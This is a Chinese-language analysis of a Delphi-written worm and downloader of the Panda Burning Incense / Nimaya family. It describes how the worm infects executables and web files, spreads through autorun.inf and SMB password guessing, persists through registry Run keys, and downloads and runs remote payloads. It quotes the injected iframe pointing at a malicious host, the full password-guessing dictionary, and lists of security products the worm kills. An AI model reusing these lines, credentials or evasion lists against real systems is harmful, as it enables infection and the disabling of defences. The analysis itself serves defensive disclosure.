这是一个传染型的DownLoad 使用Delphi编写
该病毒的主要行为:一.传播 1.本地磁盘感染病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行文件遍历感染注:不感染文件大小超过10485760字节以上的.(病毒将不感染如下目录的文件):Microsoft FrontpageMovie MakerMSN Gamin ZoneCommon FilesWindows NTRecycledSystem Volume InformationDocuments and Settings....(病毒将不感染文件名如下的文件):setup.exeNTDETECT.COM
病毒将使用两类感染方式应对不同后缀的文件名进行感染 1.二进制可执行文件(后缀后为:EXE,SCR,PIF,COM)将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染. 2.脚本类(后缀名为:htm,html,asp,php,jsp,aspx)在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞): <iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>在感染时会删除这些磁盘上的后缀名为.GHO
2.生成autorun.inf 病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联使病毒在用户点击被感染磁盘时能被自动运行.
3.局域网传播 病毒生成随机个局域网传播线程实现如下的传播方式:当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典进行联接.(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务启动激活病毒.
被尝试猜测密码的账户号为: Administrator Guest admin Root 用来进行密码尝试的字典为:1234password6969harley123456golfpussymustang1111shadow1313fish51507777qwertybaseball2112letmeinmein1234567812345admin5201314qq5201234567123456789654321543210000001111111188888888passpasswddatabaseabcdabc123sybase123qweservercomputersuper123asdihavenopassgodblessyouenable200220032600alpha1111111212121231231234qwer123abcpatrickadministratoratorrootfuckyoufucktesttest123temptemp123asdfqweryxcvzxcvhomeownerloginLoginpw123lovemypcmypc123admin123mypassmypass123901100
二.修改操作系统的启动关联 病毒会将自己复制到%SYSTEM32%\DRIVERS\目录下文件名为:spcolsv.exe将以1秒钟为周期不断设置如下键值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare=%病毒文件路径%
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue=0
三.下载文件启动 病毒会以20分钟为周期尝试读取特定网站上的下载文件列表如:http://wangma.9966.org/down.txt并根据文件列表指定的文件下载,并启动这些程序.
四.与杀毒软件对抗1.关闭包含以下字符串的窗口:防火墙VirusScanNOD32网镖杀毒毒霸瑞星超级兔子优化大师大师木马清道夫木馬清道夫卡巴斯基反病毒Symantec AntiVirusDubaesteem procs绿鹰PC密码防盗噬菌体木马辅助查找器System Safety MonitorWrapped gift KillerWinsock Expert游戏木马检测大师超级巡警IceSword
2.结束以下进程:Mcshield.exeVsTskMgr.exenaPrdMgr.exeUpdaterUI.exeTBMon.exescan32.exeRavmond.exeCCenter.exeRavTask.exeRav.exeRavmon.exeRavmonD.exeRavStub.exeKVXP.kxpKvMonXP.kxpKVCenter.kxpKVSrvXP.exeKRegEx.exeUIHost.exeTrojDie.kxpFrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exeregedit.exemsconfig.exetaskmgr.exe
3.关闭并删除以下服务:SchedulesharedaccessRsCCenterRsRavMonRsCCenterKVWSCKVSrvXPkavsvcAVPMcAfeeFrameworkMcShieldMcTaskManagernavapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantec Core LCNPFMntorMskServiceFireSvc
注: 因为该病毒会感染系统的htm,html,asp,php,jsp,aspx等文件,并在其中加入有利用安全漏洞进行病毒传播的链接.如果一台服务器被感染将大大增加病毒传播的范围.
解决方法下载专杀工具:http://download.rising.com.cn/zsgj/NimayaKiller.scr
转载于:https://www.cnblogs.com/wangxiang/articles/619559.html
相关资源:分析熊猫烧香病毒具有的功能.zip